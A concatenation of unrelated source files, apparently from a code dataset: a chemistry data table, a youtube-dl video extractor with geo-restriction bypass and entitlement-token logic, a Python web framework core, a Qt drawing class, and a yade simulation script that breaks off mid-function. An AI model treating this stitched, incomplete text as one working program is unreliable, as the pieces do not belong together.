DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoB-CP' ] = 42.05202847
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoA-CP' ] = 40.41876218
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoB-CP' ] = 180.73873695
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoA-CP' ] = 40.42326344
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoB-CP' ] = 9.17236900
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoA-CP' ] = 42.10593235
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoB-CP' ] = 40.34710761
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoA-CP' ] = 42.09217552
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoB-CP' ] = 42.05982938
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoA-CP' ] = 42.09328618
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoB-CP' ] = 180.72211450
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoA-CP' ] = 42.04336531
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoB-CP' ] = 9.12312499
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoA-CP' ] = 180.80545988
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoB-CP' ] = 40.30378877
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoA-CP' ] = 180.81499576
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoB-CP' ] = 42.03791353
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoA-CP' ] = 180.53794513
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoB-CP' ] = 180.54327910
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoA-CP' ] = 180.57089645
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoB-CP' ] = 9.17374713
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoA-CP' ] = 357.25263911
DATA['NUCLEAR REPULSION ENERGY']['S66-17-monoB-CP' ] = 357.22824169
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoA-CP' ] = 9.12915636
DATA['NUCLEAR REPULSION ENERGY']['S66-18-monoB-CP' ] = 206.28546361
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoA-CP' ] = 40.42190801
DATA['NUCLEAR REPULSION ENERGY']['S66-19-monoB-CP' ] = 206.28426737
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoA-CP' ] = 121.35354216
DATA['NUCLEAR REPULSION ENERGY']['S66-20-monoB-CP' ] = 121.35037507
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoA-CP' ] = 121.85534909
DATA['NUCLEAR REPULSION ENERGY']['S66-21-monoB-CP' ] = 121.85562743
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoA-CP' ] = 121.30606379
DATA['NUCLEAR REPULSION ENERGY']['S66-22-monoB-CP' ] = 357.30242624
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoA-CP' ] = 121.91206440
DATA['NUCLEAR REPULSION ENERGY']['S66-23-monoB-CP' ] = 357.16987646
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoA-CP' ] = 203.71200257
DATA['NUCLEAR REPULSION ENERGY']['S66-24-monoB-CP' ] = 203.71172379
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoA-CP' ] = 206.22564193
DATA['NUCLEAR REPULSION ENERGY']['S66-25-monoB-CP' ] = 206.22748415
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoA-CP' ] = 357.16027337
DATA['NUCLEAR REPULSION ENERGY']['S66-26-monoB-CP' ] = 357.16027370
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoA-CP' ] = 203.68422363
DATA['NUCLEAR REPULSION ENERGY']['S66-27-monoB-CP' ] = 206.25955744
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoA-CP' ] = 203.65134501
DATA['NUCLEAR REPULSION ENERGY']['S66-28-monoB-CP' ] = 357.16948119
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoA-CP' ] = 206.16040036
DATA['NUCLEAR REPULSION ENERGY']['S66-29-monoB-CP' ] = 357.23565563
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoA-CP' ] = 203.74228045
DATA['NUCLEAR REPULSION ENERGY']['S66-30-monoB-CP' ] = 33.43000301
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoA-CP' ] = 357.18726739
DATA['NUCLEAR REPULSION ENERGY']['S66-31-monoB-CP' ] = 33.40409180
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoA-CP' ] = 357.24995067
DATA['NUCLEAR REPULSION ENERGY']['S66-32-monoB-CP' ] = 24.63459975
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoA-CP' ] = 206.29228895
DATA['NUCLEAR REPULSION ENERGY']['S66-33-monoB-CP' ] = 33.42391806
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoA-CP' ] = 185.63664994
DATA['NUCLEAR REPULSION ENERGY']['S66-34-monoB-CP' ] = 185.63558546
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoA-CP' ] = 185.63471242
DATA['NUCLEAR REPULSION ENERGY']['S66-35-monoB-CP' ] = 199.36895747
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoA-CP' ] = 199.35493735
DATA['NUCLEAR REPULSION ENERGY']['S66-36-monoB-CP' ] = 199.35496470
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoA-CP' ] = 188.28929834
DATA['NUCLEAR REPULSION ENERGY']['S66-37-monoB-CP' ] = 199.34481507
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoA-CP' ] = 188.38358820
DATA['NUCLEAR REPULSION ENERGY']['S66-38-monoB-CP' ] = 188.37865241
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoA-CP' ] = 203.67735882
DATA['NUCLEAR REPULSION ENERGY']['S66-39-monoB-CP' ] = 188.40454306
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoA-CP' ] = 203.68538784
DATA['NUCLEAR REPULSION ENERGY']['S66-40-monoB-CP' ] = 199.37329650
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoA-CP' ] = 357.06617642
DATA['NUCLEAR REPULSION ENERGY']['S66-41-monoB-CP' ] = 185.61673585
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoA-CP' ] = 357.04169352
DATA['NUCLEAR REPULSION ENERGY']['S66-42-monoB-CP' ] = 188.33728572
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoA-CP' ] = 357.12713115
DATA['NUCLEAR REPULSION ENERGY']['S66-43-monoB-CP' ] = 199.36153551
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoA-CP' ] = 33.42556566
DATA['NUCLEAR REPULSION ENERGY']['S66-44-monoB-CP' ] = 185.65594848
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoA-CP' ] = 24.64923587
DATA['NUCLEAR REPULSION ENERGY']['S66-45-monoB-CP' ] = 185.73197134
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoA-CP' ] = 180.49044991
DATA['NUCLEAR REPULSION ENERGY']['S66-46-monoB-CP' ] = 185.67687994
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoA-CP' ] = 203.66921988
DATA['NUCLEAR REPULSION ENERGY']['S66-47-monoB-CP' ] = 203.67694204
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoA-CP' ] = 206.19608668
DATA['NUCLEAR REPULSION ENERGY']['S66-48-monoB-CP' ] = 206.19869697
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoA-CP' ] = 203.65045916
DATA['NUCLEAR REPULSION ENERGY']['S66-49-monoB-CP' ] = 206.22459403
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoA-CP' ] = 203.65156163
DATA['NUCLEAR REPULSION ENERGY']['S66-50-monoB-CP' ] = 24.63554547
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoA-CP' ] = 24.65072244
DATA['NUCLEAR REPULSION ENERGY']['S66-51-monoB-CP' ] = 24.64312912
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoA-CP' ] = 203.60587521
DATA['NUCLEAR REPULSION ENERGY']['S66-52-monoB-CP' ] = 121.22680816
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoA-CP' ] = 203.61290966
DATA['NUCLEAR REPULSION ENERGY']['S66-53-monoB-CP' ] = 121.83743933
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoA-CP' ] = 203.63390042
DATA['NUCLEAR REPULSION ENERGY']['S66-54-monoB-CP' ] = 9.16766818
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoA-CP' ] = 203.62143957
DATA['NUCLEAR REPULSION ENERGY']['S66-55-monoB-CP' ] = 40.41522246
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoA-CP' ] = 203.65859480
DATA['NUCLEAR REPULSION ENERGY']['S66-56-monoB-CP' ] = 42.10725315
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoA-CP' ] = 203.60060155
DATA['NUCLEAR REPULSION ENERGY']['S66-57-monoB-CP' ] = 180.55180987
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoA-CP' ] = 206.16864626
DATA['NUCLEAR REPULSION ENERGY']['S66-58-monoB-CP' ] = 206.16860003
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoA-CP' ] = 24.62604423
DATA['NUCLEAR REPULSION ENERGY']['S66-59-monoB-CP' ] = 9.17684034
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoA-CP' ] = 24.62574637
DATA['NUCLEAR REPULSION ENERGY']['S66-60-monoB-CP' ] = 121.22795347
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoA-CP' ] = 185.62492607
DATA['NUCLEAR REPULSION ENERGY']['S66-61-monoB-CP' ] = 121.23972648
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoA-CP' ] = 185.65184859
DATA['NUCLEAR REPULSION ENERGY']['S66-62-monoB-CP' ] = 121.86597939
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoA-CP' ] = 203.66095658
DATA['NUCLEAR REPULSION ENERGY']['S66-63-monoB-CP' ] = 121.23566219
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoA-CP' ] = 180.56185111
DATA['NUCLEAR REPULSION ENERGY']['S66-64-monoB-CP' ] = 33.41895147
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoA-CP' ] = 206.26607138
DATA['NUCLEAR REPULSION ENERGY']['S66-65-monoB-CP' ] = 24.59915901
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoA-CP' ] = 42.09376472
DATA['NUCLEAR REPULSION ENERGY']['S66-66-monoB-CP' ] = 206.23491680
|
lgpl-3.0
| 3,411,172,288,187,390,000
| 54.537799
| 116
| 0.516459
| false
| 2.519645
| false
| false
| false
|
jonyroda97/redbot-amigosprovaveis
|
lib/youtube_dl/extractor/go.py
|
1
|
9185
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .adobepass import AdobePassIE
from ..utils import (
int_or_none,
determine_ext,
parse_age_limit,
urlencode_postdata,
ExtractorError,
)
class GoIE(AdobePassIE):
_SITE_INFO = {
'abc': {
'brand': '001',
'requestor_id': 'ABC',
},
'freeform': {
'brand': '002',
'requestor_id': 'ABCFamily',
},
'watchdisneychannel': {
'brand': '004',
'requestor_id': 'Disney',
},
'watchdisneyjunior': {
'brand': '008',
'requestor_id': 'DisneyJunior',
},
'watchdisneyxd': {
'brand': '009',
'requestor_id': 'DisneyXD',
}
}
_VALID_URL = r'https?://(?:(?P<sub_domain>%s)\.)?go\.com/(?:(?:[^/]+/)*(?P<id>vdka\w+)|(?:[^/]+/)*(?P<display_id>[^/?#]+))'\
% '|'.join(list(_SITE_INFO.keys()) + ['disneynow'])
_TESTS = [{
'url': 'http://abc.go.com/shows/designated-survivor/video/most-recent/VDKA3807643',
'info_dict': {
'id': 'VDKA3807643',
'ext': 'mp4',
'title': 'The Traitor in the White House',
'description': 'md5:05b009d2d145a1e85d25111bd37222e8',
},
'params': {
# m3u8 download
'skip_download': True,
},
}, {
'url': 'http://watchdisneyxd.go.com/doraemon',
'info_dict': {
'title': 'Doraemon',
'id': 'SH55574025',
},
'playlist_mincount': 51,
}, {
'url': 'http://abc.go.com/shows/the-catch/episode-guide/season-01/10-the-wedding',
'only_matching': True,
}, {
'url': 'http://abc.go.com/shows/world-news-tonight/episode-guide/2017-02/17-021717-intense-stand-off-between-man-with-rifle-and-police-in-oakland',
'only_matching': True,
}, {
# brand 004
'url': 'http://disneynow.go.com/shows/big-hero-6-the-series/season-01/episode-10-mr-sparkles-loses-his-sparkle/vdka4637915',
'only_matching': True,
}, {
# brand 008
'url': 'http://disneynow.go.com/shows/minnies-bow-toons/video/happy-campers/vdka4872013',
'only_matching': True,
}]
def _extract_videos(self, brand, video_id='-1', show_id='-1'):
display_id = video_id if video_id != '-1' else show_id
return self._download_json(
'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/%s/-1/%s/-1/-1.json' % (brand, show_id, video_id),
display_id)['video']
def _real_extract(self, url):
sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups()
site_info = self._SITE_INFO.get(sub_domain, {})
brand = site_info.get('brand')
if not video_id or not site_info:
webpage = self._download_webpage(url, display_id or video_id)
video_id = self._search_regex(
# There may be inner quotes, e.g. data-video-id="'VDKA3609139'"
# from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood
r'data-video-id=["\']*(VDKA\w+)', webpage, 'video id',
default=None)
if not site_info:
brand = self._search_regex(
(r'data-brand=\s*["\']\s*(\d+)',
r'data-page-brand=\s*["\']\s*(\d+)'), webpage, 'brand',
default='004')
site_info = next(
si for _, si in self._SITE_INFO.items()
if si.get('brand') == brand)
if not video_id:
# show extraction works for Disney, DisneyJunior and DisneyXD
# ABC and Freeform has different layout
show_id = self._search_regex(r'data-show-id=["\']*(SH\d+)', webpage, 'show id')
videos = self._extract_videos(brand, show_id=show_id)
show_title = self._search_regex(r'data-show-title="([^"]+)"', webpage, 'show title', fatal=False)
entries = []
for video in videos:
entries.append(self.url_result(
video['url'], 'Go', video.get('id'), video.get('title')))
entries.reverse()
return self.playlist_result(entries, show_id, show_title)
video_data = self._extract_videos(brand, video_id)[0]
video_id = video_data['id']
title = video_data['title']
formats = []
for asset in video_data.get('assets', {}).get('asset', []):
asset_url = asset.get('value')
if not asset_url:
continue
format_id = asset.get('format')
ext = determine_ext(asset_url)
if ext == 'm3u8':
video_type = video_data.get('type')
data = {
'video_id': video_data['id'],
'video_type': video_type,
'brand': brand,
'device': '001',
}
if video_data.get('accesslevel') == '1':
requestor_id = site_info['requestor_id']
resource = self._get_mvpd_resource(
requestor_id, title, video_id, None)
auth = self._extract_mvpd_auth(
url, video_id, requestor_id, resource)
data.update({
'token': auth,
'token_type': 'ap',
'adobe_requestor_id': requestor_id,
})
else:
self._initialize_geo_bypass({'countries': ['US']})
entitlement = self._download_json(
'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',
video_id, data=urlencode_postdata(data))
errors = entitlement.get('errors', {}).get('errors', [])
if errors:
for error in errors:
if error.get('code') == 1002:
self.raise_geo_restricted(
error['message'], countries=['US'])
error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
|
gpl-3.0
| 2,572,050,881,610,135,600
| 41.133028
| 155
| 0.470876
| false
| 3.776727
| false
| false
| false
|
SunDwarf/Kyoukai
|
kyoukai/app.py
|
1
|
15848
|
"""
The core application.
"""
import asyncio
import logging
import traceback
from asphalt.core import Context, run_application
from werkzeug.exceptions import NotFound, MethodNotAllowed, HTTPException, InternalServerError, \
BadRequestKeyError
from werkzeug.routing import RequestRedirect, Map
from werkzeug.wrappers import Request, Response
from kyoukai.asphalt import HTTPRequestContext
from kyoukai.blueprint import Blueprint
__version__ = "2.2.1.post1"
version_format = "Kyoukai/{}".format(__version__)
logger = logging.getLogger("Kyoukai")
class Kyoukai(object):
"""
The Kyoukai type is the core of the Kyoukai framework, and the core of your web application
based upon the Kyoukai framework. It acts as a central router and request processor that
takes in requests from the protocols and returns responses.
The application name is currently unused, but it is good practice to set it correctly anyway in
case it is used in future editions of Kyoukai.
You normally create an application instance inside your component file, like so:
.. code-block:: python
from kyoukai.app import Kyoukai
... # setup code
kyk = Kyoukai("my_app")
kyk.register_blueprint(whatever)
... # other setup
class MyContainer(ContainerComponent):
async def start(self, ctx):
self.add_component('kyoukai', KyoukaiComponent, ip="127.0.0.1", port=4444,
app="app:app")
Of course, you can also embed Kyoukai inside another app, by awaiting :meth:`Kyoukai.start`.
"""
#: The class of request to spawn every request.
#: This should be a subclass of :class:`werkzeug.wrappers.Request`.
#: You can override this by passing ``request_class`` as a keyword argument to the app.
request_class = Request
#: The class of response to wrap automatically.
#: This should be a subclass of :class:`werkzeug.wrappers.Response`.
#: You can override this by passing ``response_class`` as a keyword argument to the app.
response_class = Response
def __init__(self,
application_name: str,
*,
server_name: str = None,
**kwargs):
"""
:param application_name: The name of the application that is being created. This is \
passed to the :class:`.Blueprint` being created as the root blueprint.
This is used in ``url_for``, for example, to get the endpoint of routes registered to \
the root Blueprint.
:param server_name: Keyword-only. The SERVER_NAME to use inside the fake WSGI environment \
created for ``url_for``, if applicable.
:param host_matching: Should host matching be enabled? This will be implicitly True if \
``host`` is not None.
:param host: The host used for host matching, to be passed to the root Blueprint.
By default, no host is used, so all hosts are matched on the root Blueprint.
:param application_root: Keyword-only. The APPLICATION_ROOT to use inside the fake WSGI \
environment created for ``url_for``, if applicable.
:param loop: Keyword-only. The asyncio event loop to use for this app. If no loop is \
specified it, will be automatically fetched using :meth:`asyncio.get_event_loop`.
:param request_class: Keyword-only. The custom request class to instantiate requests with.
:param response_class: Keyword-only. The custom response class to instantiate responses \
with.
:param context_class: Keyword-only. The :class:`.Context` subclass to use when creating a \
context. Defaults to :class:`.HTTPRequestContext`.
"""
self.name = application_name
self.server_name = server_name
# Try and get the loop from the keyword arguments - don't automatically perform
# `get_event_loop`.
self.loop = kwargs.pop("loop", None)
if not self.loop:
self.loop = asyncio.get_event_loop()
# Create the root blueprint.
self._root_bp = Blueprint(application_name, host=kwargs.get("host"),
host_matching=kwargs.get("host_matching", False))
# The current Component that is running this app.
self.component = None
# The Request/Response classes.
self.request_class = kwargs.pop("request_class", self.request_class)
self.response_class = kwargs.pop("response_class", self.response_class)
#: The context class.
self.context_class = kwargs.pop("context_class", HTTPRequestContext)
# Is this app set to debug mode?
self.debug = False
# Any extra config.
self.config = kwargs
@property
def root(self) -> Blueprint:
"""
:return: The root Blueprint for the routing tree.
"""
return self._root_bp
def register_blueprint(self, child: Blueprint):
"""
Registers a child blueprint to this app's root Blueprint.
This will set up the Blueprint tree, as well as setting up the routing table when finalized.
:param child: The child Blueprint to add. This must be an instance of :class:`~.Blueprint`.
"""
return self.root.add_child(child)
def finalize(self, **map_options) -> Map:
"""
Finalizes the app and blueprints.
This will calculate the current :class:`werkzeug.routing.Map` which is required for
routing to work.
:param map_options: The options to pass to the Map for routing.
"""
self.debug = self.config.get("debug", False)
return self.root.finalize(**map_options)
# Magic methods
def __getattr__(self, item: str) -> object:
"""
Override for __getattr__ to allow transparent mirroring onto the root Blueprint.
For example, this allows doing ``@app.route`` instead of ``@app.root.route``.
"""
if item in ("route", "errorhandler", "add_errorhandler", "add_route", "wrap_route",
"url_for", "before_request", "add_hook", "after_request",
"add_route_group"):
return getattr(self.root, item)
raise AttributeError("'{.__class__.__name__}' object has no attribute {}"
.format(self, item))
def log_route(self, request: Request, code: int):
"""
Logs a route invocation.
:param request: The request produced.
:param code: The response code of the route.
"""
fmtted = "{} {} - {}".format(request.method, request.path, code)
logger.info(fmtted)
async def handle_httpexception(self, ctx: HTTPRequestContext, exception: HTTPException,
environ: dict = None) -> Response:
"""
Handle a HTTP Exception.
:param ctx: The context of the request.
:param exception: The HTTPException to handle.
:param environ: The fake WSGI environment.
:return: A :class:`werkzeug.wrappers.Response` that handles this response.
"""
# Try and load the error handler recursively from the ctx.route.blueprint.
bp = ctx.bp or self.root
if environ is None:
environ = ctx.environ
cbl = lambda environ: Response("Internal server error during processing. Report this.",
status=500)
error_handler = bp.get_errorhandler(exception)
if not error_handler:
# Try the root Blueprint. This may happen if the blueprint requested isn't registered
# properly in the root, for some reason.
error_handler = self.root.get_errorhandler(exception)
if not error_handler:
# Just return the Exception's get_response.
cbl = exception.get_response
else:
# Try and invoke the error handler to get the Response.
# Wrap it in the try/except, so we can handle a default one.
try:
res = await error_handler.invoke(ctx, args=(exception,))
# hacky way of unifying everything
cbl = lambda environ: res
except HTTPException as e:
# why tho?
logger.warning("Error handler function raised another error, using the "
"response from that...")
cbl = e.get_response
except Exception as e:
logger.exception("Error in error handler!")
cbl = InternalServerError(e).get_response
# else:
# result = wrap_response(result, self.response_class)
try:
result = cbl(environ=environ)
except Exception:
# ok
logger.critical("Whilst handling a {}, response.get_response ({}) raised exception"
.format(exception.code, cbl), exc_info=True)
result = Response("Critical server error. Your application is broken.",
status=500)
if result.status_code != exception.code:
logger.warning("Error handler {} returned code {} when exception was code {}..."
.format(error_handler.callable_repr, result.status_code,
exception.code))
return result
async def process_request(self, request: Request, parent_context: Context) -> Response:
"""
Processes a Request and returns a Response object.
This is the main processing method of Kyoukai, and is meant to be used by one of the HTTP
server backends, and not by client code.
:param request: \
The :class:`werkzeug.wrappers.Request` object to process.
A new :class:`~.HTTPRequestContext` will be provided to wrap this request inside of \
to client code.
:param parent_context: \
The :class:`asphalt.core.Context` that is the parent context for this particular app.
It will be used as the parent for the HTTPRequestContext.
:return: A :class:`werkzeug.wrappers.Response` object that can be written to the client \
as a response.
"""
if not self.root.finalized:
raise RuntimeError("App was not finalized")
# Create a new HTTPRequestContext.
ctx = self.context_class(parent_context, request)
ctx.app = self
async with ctx:
# Call match on our Blueprint to find the request.
try:
matched, params, rule = self.root.match(request.environ)
ctx.params = params
ctx.rule = rule
except NotFound as e:
# No route matched.
self.log_route(ctx.request, 404)
logger.debug("Could not resolve route for {request.path}."
.format(request=request))
return await self.handle_httpexception(ctx, e, request.environ)
except MethodNotAllowed as e:
# 405 method not allowed
self.log_route(ctx.request, 405)
logger.debug("Could not resolve valid method for "
"{request.path} ({request.method})".format(request=request))
return await self.handle_httpexception(ctx, e, request.environ)
except RequestRedirect as e:
# slashes etc
# user code is not allowed to handle this
self.log_route(ctx.request, 307)
e.code = 307
return e.get_response(request.environ)
else:
ctx.route_matched.dispatch(ctx=ctx)
ctx.route = matched
ctx.bp = ctx.route.bp
result = None
# Invoke the route.
try:
ctx.route_invoked.dispatch(ctx=ctx)
# INTERCEPT
if ctx.request.method.upper() == "OPTIONS":
# NO USER CODE HERE HEHEHEHEHE
# instead, we need to return an Allow: header
# kyoukai autocalcs this
result = Response(status=204)
result.headers["Allow"] = ",".join(x for x in ctx.rule.methods if x !=
"OPTIONS")
else:
result = await matched.invoke(ctx, params=params)
except BadRequestKeyError as e:
logger.info("BadRequestKeyError: {}".format(' '.join(e.args)), exc_info=True)
result = await self.handle_httpexception(ctx, e, request.environ)
except HTTPException as e:
fmtted = traceback.format_exception(type(e), e, e.__traceback__)
logger.debug(''.join(fmtted))
logger.info(
"Hit HTTPException ({}) inside function, delegating.".format(str(e))
)
result = await self.handle_httpexception(ctx, e, request.environ)
except Exception as e:
logger.exception("Unhandled exception in route function")
new_e = InternalServerError()
new_e.__cause__ = e
result = await self.handle_httpexception(ctx, new_e, request.environ)
else:
ctx.route_completed.dispatch(ctx=ctx, result=result)
finally:
# result = wrap_response(result, self.response_class)
if result:
# edge cases
self.log_route(ctx.request, result.status_code)
# Update the Server header.
result.headers["Server"] = version_format
# list means wsgi response probably
if not isinstance(result.response, (bytes, str, list)):
result.set_data(str(result.response))
result.headers["X-Powered-By"] = version_format
# Return the new Response.
return result
async def start(self, ip: str = "127.0.0.1", port: int = 4444, *,
component=None, base_context: Context = None):
"""
Runs the Kyoukai component asynchronously.
This will bypass Asphalt's default runner, and allow you to run your app easily inside
something else, for example.
:param ip: The IP of the built-in server.
:param port: The port of the built-in server.
:param component: The component to start the app with. This should be an instance of \
:class:`~.KyoukaiComponent`.
:param base_context: The base context that the HTTPRequestContext should be started with.
"""
if not base_context:
base_context = Context()
if not component:
from kyoukai.asphalt import KyoukaiComponent
self.component = KyoukaiComponent(self, ip, port)
else:
self.component = component
# Start the app.
await self.component.start(base_context)
def run(self, ip: str = "127.0.0.1", port: int = 4444, *,
component=None):
"""
Runs the Kyoukai server from within your code.
This is not normally invoked - instead Asphalt should invoke the Kyoukai component.
However, this is here for convenience.
"""
if not component:
from kyoukai.asphalt import KyoukaiComponent
component = KyoukaiComponent(self, ip, port)
run_application(component)
|
mit
| 6,110,582,815,789,452,000
| 39.74036
| 100
| 0.585247
| false
| 4.613683
| false
| false
| false
|
RoboCupULaval/UI-Debug
|
Controller/DrawingObject/TextDrawing.py
|
1
|
1227
|
# Under MIT License, see LICENSE.txt
from Controller.DrawingObject.BaseDrawingObject import BaseDrawingObject
from Controller.QtToolBox import QtToolBox
from Model.DataObject.DrawingData.DrawTextDataIn import DrawTextDataIn
__author__ = 'RoboCupULaval'
class TextDrawing(BaseDrawingObject):
def __init__(self, data_in):
BaseDrawingObject.__init__(self, data_in)
def draw(self, painter):
# TODO Add alignment
if self.isVisible():
data = self.data
painter.setPen(QtToolBox.create_pen(color=data['color'],
width=data['size']))
painter.setBrush(QtToolBox.create_brush(data['color']))
painter.setFont(QtToolBox.create_font(style=data['font'],
width=data['size'],
is_bold=data['has_bold'],
is_italic=data['has_italic']))
x, y, _ = QtToolBox.field_ctrl.convert_real_to_scene_pst(*data['position'])
painter.drawText(x, y, data['text'])
@staticmethod
def get_datain_associated():
return DrawTextDataIn.__name__
|
mit
| 5,168,425,059,868,672,000
| 38.580645
| 87
| 0.564792
| false
| 4.159322
| false
| false
| false
|
anna-effeindzourou/trunk
|
examples/anna_scripts/triax/debug/triaxial.py
|
1
|
3282
|
# -*- coding: utf-8
from yade import ymport, utils,pack,export,qt
import gts,os
from yade import geom
#import matplotlib
from yade import plot
#from pylab import *
#import os.path, locale
#################################
##### FUNCTIONS ####
#################################
def writeFile():
yade.export.text('spheres_1e-02.txt')
####################
### MATERIAL ###
####################
poisson=0.28
E=2*7.9e10*(1+poisson) ##1e11
density=7.8e8
frictionAngle=0.096
frictionAngleW=0.228
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngleW,label='Wallmat'))
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngle,label='Smat'))
##########################
### SPHERE PACKING ###
##########################
#### Parameters the cylinder ###
L=0.203 #high [m]
l=0.0505 # radius [m]
color=[155./255.,155./255.,100./255.]
radius=1e-02
kwBoxes={'color':[1,0,0],'wire':True,'dynamic':False,'material':1}
O.bodies.append(utils.geom.facetCylinder(center=Vector3(0,0,L/2.), radius=l, height=L, orientation=Quaternion((1, 0, 0), 0),**kwBoxes))
###erase the top and bottom facet of the cylinder
for i in range(0,40,4):
O.bodies.erase(i)
for i in range(1,38,4):
O.bodies.erase(i)
predicate=inCylinder(centerBottom=Vector3(0,0,0), centerTop=Vector3(0,0,L+L/2.), radius=l-0.005)
sp=SpherePack()
sp=pack.randomDensePack(predicate, radius=radius, material='Smat', cropLayers=10, rRelFuzz=0.0, spheresInCell=100,returnSpherePack=True)
sp.toSimulation()
########################
#### WALL GENERATION ##
########################
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngleW,label='Wmat'))
topPlate=utils.wall(position=hMax(2)+radius*10,sense=0, axis=2,color=Vector3(1,0,0),material='Wmat')
O.bodies.append(topPlate)
bottomPlate=utils.wall(position=0,sense=0, axis=2,color=Vector3(1,0,0),material='Wmat')
O.bodies.append(bottomPlate)
######################
#### MOVE TOP WALL ##
######################
v=1.7e-03
def movewall(v):
